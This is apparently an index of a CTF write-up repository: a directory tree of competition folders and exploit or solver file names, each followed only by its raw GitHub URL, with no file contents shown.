├── 3kCTF-2020 └── PWN │ ├── base jumper │ └── solver.py │ ├── big houses │ └── solver.py │ ├── faker │ └── sploit.py │ ├── linker revenge │ └── sploit.py │ ├── linker │ └── sploit.py │ └── one and a half man │ └── solver_bof.py ├── ALLES! CTF 2020 └── Binary exploitation │ └── Actual ASLR 2 │ ├── gen │ ├── gen.c │ └── sploit.py ├── ASIS CTF QUALS 2020 └── sploit.py ├── Byte Bandits CTF 2020 └── pwn │ ├── fmt-me │ └── sploit.py │ └── write │ └── sploit.py ├── CSAW CTF 2020 QUALS ├── PWN │ └── roppity │ │ └── sploit.py └── REV │ ├── Blox1 │ ├── automatic_solver.py │ └── generate_shape.py │ └── not_malware │ ├── sploit │ └── sploit.c ├── CSAW CTF QUALS 2021 └── pwn │ └── Procrastination │ └── exploit.py ├── CSAW CTF'19 QUALS ├── BABY BOI │ ├── README.md │ ├── baby_boi │ ├── ex1.png │ ├── executing.png │ ├── final.png │ ├── gdb.png │ ├── libc-2.27.so │ ├── patt.png │ ├── ps.py │ ├── readelf_execve.png │ └── readelf_printf.png ├── GOT MILK │ ├── README.md │ ├── exec.png │ ├── fl.png │ ├── gdb.png │ ├── gotmilk │ ├── ida.png │ ├── ida1.png │ ├── ida2.png │ ├── ldd.png │ ├── libmylib.so │ ├── needed.png │ ├── objdump.png │ ├── off.png │ ├── pay.png │ └── running.png └── SMALL BOI │ ├── README.md │ ├── binsh.png │ ├── fault.png │ ├── final.png │ ├── gadgets.png │ ├── ida.png │ ├── ida1.png │ ├── off.png │ ├── pay1.png │ ├── pay2.png │ ├── rm.png │ ├── small_boi │ ├── sploit.py │ ├── strings.png │ └── syscall.png ├── Defenit CTF 2020 └── Error program │ ├── README.md │ └── sploit.py ├── FwordCTF 2020 ├── Reverse engineering │ └── auto │ │ └── solver.py └── binary exploitation │ └── blacklist │ └── sploit.py ├── FwordCTF 2021 └── Reverse engineering │ ├── Omen │ ├── Omen_Final.exe │ ├── gen.py │ ├── parsed_inst.txt │ ├── slv.py │ └── unpacked.exe │ ├── Time Machine │ ├── Time_Machine.exe │ ├── a.cc │ ├── a.out │ ├── clean_assembly.py │ ├── clean_diassembly.txt │ ├── parsed_assembly.txt │ └── solver.py │ └── saw │ ├── SAW.exe │ ├── parsed_disassembly.txt │ ├── patched_binary_to_get_clean_disassembly.exe │ └── solver.py ├── Hack Zone Tunisia 2020 ├── misc │ └── BigDriver │ │ └── solver.py └── pwn │ ├── pwn1 │ └── sploit.py │ ├── pwn2 │ └── sploit.py │ └── pwn3 │ └── sploit.py ├── HacktivityCon CTF 2020 └── pwn │ ├── What's In The Jar? │ └── sploit.py │ ├── almost │ └── sploit.py │ ├── bullseye │ └── sploit.py │ └── space force │ └── sploit.py ├── InCTF 2020 └── PWN │ └── party planner │ └── sploit.py ├── Midnight Sun CTF 2020 Quals └── pwn │ ├── pwny racing 2 │ └── sploit.py │ └── pwny racing 3 │ └── sploit.py ├── Plaid CTF 2020 └── rev │ └── YOU wa SHOCKWAVE │ ├── DCR2DIRoutput.dir │ ├── lingocode │ └── solver.py ├── Poseidon CTF 1st Edition ├── PWN │ ├── Cards │ │ └── sploit.py │ └── Oldnote │ │ └── sploit.py └── REV │ └── Dune │ └── solver.py ├── Praygan CTF 2020 └── binary │ ├── Auction │ ├── README.md │ ├── final.png │ ├── gdb.png │ ├── ida.png │ ├── ida1.png │ ├── ida2.png │ ├── ida3.png │ └── xor.png │ ├── Battle │ ├── README.md │ ├── ida1.png │ ├── ida2.png │ └── sploit.py │ └── Hide and seek │ ├── README.md │ ├── ida.png │ └── sploit.py ├── README.md ├── RedpwCTF 2021 └── rev │ └── pickled-onions │ ├── README.md │ ├── final │ └── solver.py ├── SECURINETS Congress CTF 2020 ├── Reverse Engineering │ ├── CARL FRIEDRICH GAUSS 5 │ │ ├── README.md │ │ ├── sploit.py │ │ └── task │ ├── README.md │ └── time traveler │ │ ├── README.md │ │ ├── generate_right_key │ │ ├── generate_right_key.c │ │ ├── sploit.py │ │ └── task └── pwn │ ├── README.md │ ├── pwn1 │ ├── README.md │ ├── solver.py │ └── task │ ├── pwn2 │ ├── README.md │ ├── solver.py │ └── task │ └── pwn3 │ ├── README.md │ ├── solver.py │ └── task ├── Securinets CTF Quals 2020 └── REVERSING │ ├── CHANGE │ ├── README.md │ ├── dump.png │ ├── exec.png │ └── final.png │ ├── KAVM │ └── README.md │ ├── Warmup : Welcome to securinets CTF │ ├── README.md │ ├── exec.png │ └── main.png │ ├── static EYELESS REVENGE │ ├── README.md │ ├── exec.png │ ├── functions.png │ ├── last.png │ ├── main.png │ ├── ren.png │ ├── right.png │ ├── sol.png │ ├── start.png │ ├── strings.png │ └── xref.png │ └── static EYELESS │ ├── README.md │ ├── exec.png │ ├── ida.png │ └── value.png ├── Securinets-CTF-QUALS-2019 └── RE │ ├── AutomateMe │ ├── README.md │ ├── args.png │ ├── bin │ ├── instructions.txt │ ├── main.png │ ├── solver.py │ └── text.png │ ├── Matrix of hell │ ├── README.md │ ├── bin │ ├── executing.png │ ├── flag.png │ ├── input.png │ ├── matrix.png │ ├── pol.png │ ├── res.png │ └── xor.png │ ├── RBOOM │ ├── README.md │ ├── chall.zip │ ├── decrypt.png │ ├── func.png │ ├── main.png │ ├── rc4.png │ └── xor.png │ ├── README.md │ ├── Vectors │ ├── README.md │ ├── VECTORS.zip │ ├── begin.png │ ├── copy.png │ ├── end.png │ ├── excute.png │ ├── final.png │ ├── flag.png │ ├── init1.png │ ├── init2.png │ ├── main.png │ ├── right.png │ ├── sort.png │ ├── strings.png │ ├── wrong_input.png │ └── xor_correct.png │ ├── monster │ ├── MONSTER.zip │ ├── README.md │ ├── cat.png │ ├── dat.png │ ├── flag.png │ ├── go.png │ ├── input.png │ ├── main.png │ ├── md5.png │ ├── strcmp.png │ └── xor.png │ └── warmup │ ├── README.md │ ├── bin │ ├── call_b64encode.png │ ├── call_b64encode1.png │ ├── checksb64.png │ ├── executing.png │ └── solver.py ├── Securinets-MINICTF-2019 ├── README.md ├── pwn │ ├── indianstyle │ │ ├── sploit.py │ │ └── task │ ├── onestepahead │ │ ├── sploit.py │ │ └── task │ ├── shellhunter │ │ ├── sploit.py │ │ └── tas │ ├── winner │ │ ├── sploit.py │ │ └── task │ └── winner_revenge │ │ ├── sploit.py │ │ └── task └── rev │ ├── basicsagain │ ├── sol.py │ └── task │ ├── mennawmenghadi │ ├── solv.py │ └── task │ ├── thepowerofchange │ ├── sol.py │ └── task │ ├── youcantseeme │ ├── sol.txt │ └── task │ └── youcantseemerevenge │ ├── bin │ └── sol.png ├── SuSeC CTF 2020 └── pwn │ └── unary │ └── sploit.py ├── TG:HACK 2020 └── pwn │ ├── The Biohacker's Herbarium Service │ └── sploit.py │ └── useless crap │ └── sploit.py ├── UTCTF 2020 └── PWN │ └── zurk │ ├── README.md │ └── sploit.py ├── VirSecCon CTF └── binary exploitation │ ├── Shopping list │ └── sploit.py │ └── seed spring │ ├── sploit.py │ ├── task │ └── task.c ├── X-MAS CTF 2019 ├── Eggnog │ ├── README.md │ └── sploit.py ├── SN0WVERFL0W │ ├── README.md │ └── sploit.py ├── The Elf Postmaster │ ├── README.md │ └── sploit.py └── The Weather │ ├── README.md │ └── sploit.py ├── X-MAS-ctf └── Endless Christmas │ ├── exec.png │ ├── grep.png │ ├── ls.png │ ├── main.png │ ├── mainfile.png │ ├── strings.png │ ├── task.png │ └── writeup.md ├── _config.yml ├── kek.js ├── name.js ├── name1.js ├── name2.js ├── stager.ps1 ├── tara.js └── ångstromCTF 2020 └── crypto └── One Time Bad └── solver.py /3kCTF-2020/PWN/base jumper/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/base jumper/solver.py -------------------------------------------------------------------------------- /3kCTF-2020/PWN/big houses/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/big houses/solver.py -------------------------------------------------------------------------------- /3kCTF-2020/PWN/faker/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/faker/sploit.py -------------------------------------------------------------------------------- /3kCTF-2020/PWN/linker revenge/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/linker revenge/sploit.py -------------------------------------------------------------------------------- /3kCTF-2020/PWN/linker/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/linker/sploit.py -------------------------------------------------------------------------------- /3kCTF-2020/PWN/one and a half man/solver_bof.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/3kCTF-2020/PWN/one and a half man/solver_bof.py -------------------------------------------------------------------------------- /ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/gen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/gen -------------------------------------------------------------------------------- /ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/gen.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/gen.c -------------------------------------------------------------------------------- /ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/ALLES! CTF 2020/Binary exploitation/Actual ASLR 2/sploit.py -------------------------------------------------------------------------------- /ASIS CTF QUALS 2020/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/ASIS CTF QUALS 2020/sploit.py -------------------------------------------------------------------------------- /Byte Bandits CTF 2020/pwn/fmt-me/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Byte Bandits CTF 2020/pwn/fmt-me/sploit.py -------------------------------------------------------------------------------- /Byte Bandits CTF 2020/pwn/write/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Byte Bandits CTF 2020/pwn/write/sploit.py -------------------------------------------------------------------------------- /CSAW CTF 2020 QUALS/PWN/roppity/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF 2020 QUALS/PWN/roppity/sploit.py -------------------------------------------------------------------------------- /CSAW CTF 2020 QUALS/REV/Blox1/automatic_solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF 2020 QUALS/REV/Blox1/automatic_solver.py -------------------------------------------------------------------------------- /CSAW CTF 2020 QUALS/REV/Blox1/generate_shape.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF 2020 QUALS/REV/Blox1/generate_shape.py -------------------------------------------------------------------------------- /CSAW CTF 2020 QUALS/REV/not_malware/sploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF 2020 QUALS/REV/not_malware/sploit -------------------------------------------------------------------------------- /CSAW CTF 2020 QUALS/REV/not_malware/sploit.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF 2020 QUALS/REV/not_malware/sploit.c -------------------------------------------------------------------------------- /CSAW CTF QUALS 2021/pwn/Procrastination/exploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF QUALS 2021/pwn/Procrastination/exploit.py -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/README.md -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/baby_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/baby_boi -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/ex1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/ex1.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/executing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/executing.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/final.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/gdb.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/libc-2.27.so -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/patt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/patt.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/ps.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/ps.py -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/readelf_execve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/readelf_execve.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/BABY BOI/readelf_printf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/BABY BOI/readelf_printf.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/README.md -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/exec.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/fl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/fl.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/gdb.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/gotmilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/gotmilk -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/ida.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/ida1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/ida1.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/ida2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/ida2.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/ldd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/ldd.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/libmylib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/libmylib.so -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/needed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/needed.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/objdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/objdump.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/off.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/pay.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/pay.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/GOT MILK/running.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/GOT MILK/running.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/README.md -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/binsh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/binsh.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/fault.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/fault.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/final.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/final.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/gadgets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/gadgets.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/ida.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/ida1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/ida1.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/off.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/pay1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/pay1.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/pay2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/pay2.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/rm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/rm.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/small_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/small_boi -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/sploit.py -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/strings.png -------------------------------------------------------------------------------- /CSAW CTF'19 QUALS/SMALL BOI/syscall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/CSAW CTF'19 QUALS/SMALL BOI/syscall.png -------------------------------------------------------------------------------- /Defenit CTF 2020/Error program/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Defenit CTF 2020/Error program/README.md -------------------------------------------------------------------------------- /Defenit CTF 2020/Error program/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Defenit CTF 2020/Error program/sploit.py -------------------------------------------------------------------------------- /FwordCTF 2020/Reverse engineering/auto/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2020/Reverse engineering/auto/solver.py -------------------------------------------------------------------------------- /FwordCTF 2020/binary exploitation/blacklist/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2020/binary exploitation/blacklist/sploit.py -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Omen/Omen_Final.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Omen/Omen_Final.exe -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Omen/gen.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Omen/gen.py -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Omen/parsed_inst.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Omen/parsed_inst.txt -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Omen/slv.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Omen/slv.py -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Omen/unpacked.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Omen/unpacked.exe -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/Time_Machine.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/Time_Machine.exe -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/a.cc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/a.cc -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/a.out -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/clean_assembly.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/clean_assembly.py -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/clean_diassembly.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/clean_diassembly.txt -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/parsed_assembly.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/parsed_assembly.txt -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/Time Machine/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/Time Machine/solver.py -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/saw/SAW.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/saw/SAW.exe -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/saw/parsed_disassembly.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/saw/parsed_disassembly.txt -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/saw/patched_binary_to_get_clean_disassembly.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/saw/patched_binary_to_get_clean_disassembly.exe -------------------------------------------------------------------------------- /FwordCTF 2021/Reverse engineering/saw/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/FwordCTF 2021/Reverse engineering/saw/solver.py -------------------------------------------------------------------------------- /Hack Zone Tunisia 2020/misc/BigDriver/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Hack Zone Tunisia 2020/misc/BigDriver/solver.py -------------------------------------------------------------------------------- /Hack Zone Tunisia 2020/pwn/pwn1/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Hack Zone Tunisia 2020/pwn/pwn1/sploit.py -------------------------------------------------------------------------------- /Hack Zone Tunisia 2020/pwn/pwn2/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Hack Zone Tunisia 2020/pwn/pwn2/sploit.py -------------------------------------------------------------------------------- /Hack Zone Tunisia 2020/pwn/pwn3/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Hack Zone Tunisia 2020/pwn/pwn3/sploit.py -------------------------------------------------------------------------------- /HacktivityCon CTF 2020/pwn/What's In The Jar?/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/HacktivityCon CTF 2020/pwn/What's In The Jar?/sploit.py -------------------------------------------------------------------------------- /HacktivityCon CTF 2020/pwn/almost/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/HacktivityCon CTF 2020/pwn/almost/sploit.py -------------------------------------------------------------------------------- /HacktivityCon CTF 2020/pwn/bullseye/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/HacktivityCon CTF 2020/pwn/bullseye/sploit.py -------------------------------------------------------------------------------- /HacktivityCon CTF 2020/pwn/space force/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/HacktivityCon CTF 2020/pwn/space force/sploit.py -------------------------------------------------------------------------------- /InCTF 2020/PWN/party planner/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/InCTF 2020/PWN/party planner/sploit.py -------------------------------------------------------------------------------- /Midnight Sun CTF 2020 Quals/pwn/pwny racing 2/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Midnight Sun CTF 2020 Quals/pwn/pwny racing 2/sploit.py -------------------------------------------------------------------------------- /Midnight Sun CTF 2020 Quals/pwn/pwny racing 3/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Midnight Sun CTF 2020 Quals/pwn/pwny racing 3/sploit.py -------------------------------------------------------------------------------- /Plaid CTF 2020/rev/YOU wa SHOCKWAVE/DCR2DIRoutput.dir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Plaid CTF 2020/rev/YOU wa SHOCKWAVE/DCR2DIRoutput.dir -------------------------------------------------------------------------------- /Plaid CTF 2020/rev/YOU wa SHOCKWAVE/lingocode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Plaid CTF 2020/rev/YOU wa SHOCKWAVE/lingocode -------------------------------------------------------------------------------- /Plaid CTF 2020/rev/YOU wa SHOCKWAVE/solver.py: -------------------------------------------------------------------------------- 